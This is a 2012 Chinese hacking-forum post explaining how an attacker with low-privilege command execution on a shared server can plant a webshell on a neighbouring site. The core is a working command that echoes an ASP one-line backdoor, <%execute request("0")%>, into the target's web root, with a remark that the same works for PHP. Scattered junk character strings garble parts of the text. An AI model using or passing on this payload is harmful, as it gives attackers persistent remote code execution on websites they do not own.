找回密码
 立即注册
查看: 2319|回复: 0
打印 上一主题 下一主题

旁注cmd低权限下拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:40:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
8 L$ @8 k" d# N6 b. j
- u# X, d; O. |  B6 Z, f$ k命令格式
/ ]) e, A  Y6 j5 f/ z7 v6 _" T1 x/ E/ ?4 ?
Echo 语句 >目标站绝对目录" H* X* d) A  [* Q, d* z

& q; ~! a5 B) R5 H+ \* c/ E例如:
4 V: T* i; M7 p: g0 f& R0 Z1 [$ |
- `& p9 f& q$ U" A; n, Fecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp9 o* F3 z' f# H, C

" {# ^: W$ F* K, M! l" s; g这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。* X/ p6 {  ]7 c/ S& x+ R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表